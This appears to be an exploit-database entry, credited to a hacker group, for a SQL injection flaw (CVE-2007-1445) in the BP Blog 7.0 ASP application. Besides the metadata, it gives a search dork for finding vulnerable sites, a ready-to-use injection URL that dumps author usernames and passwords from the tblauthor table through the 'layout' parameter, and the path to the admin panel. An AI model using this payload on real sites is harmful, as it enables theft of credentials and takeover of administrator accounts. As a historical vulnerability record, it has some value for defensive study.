BP Blog 7.0 - 'layout' SQL Injection

Author: BeyazKurt
type: webapps
platform: asp
port: 
date_added: 2007-03-11 
date_updated: 2016-12-01 
verified: 1 
codes: OSVDB-33997;CVE-2007-1445 
tags: 
aliases:  
screenshot_url:  
application_url: 

#####################################
# BeyazKurt <B3yazKurt@Hotmail.Com>
# Script : BP Blog
# D0rk   : "Powered by BP Blog 7.0"
# thnx   : Forever.slam and all WorldHackerz Team!
#
# WorldHackerz Mirr0r'da Taht Bizimdir (h) :=)
#####################################
-------
Exploit :
http://www.Site.Com/Path/default.asp?layout=-1%20%20union%20select%201,fldauthorusername,fldauthorpassword,1,1,1,1%20from%20tblauthor%20where%201=1
Admin Panel : admin_default.asp

# milw0rm.com [2007-03-12]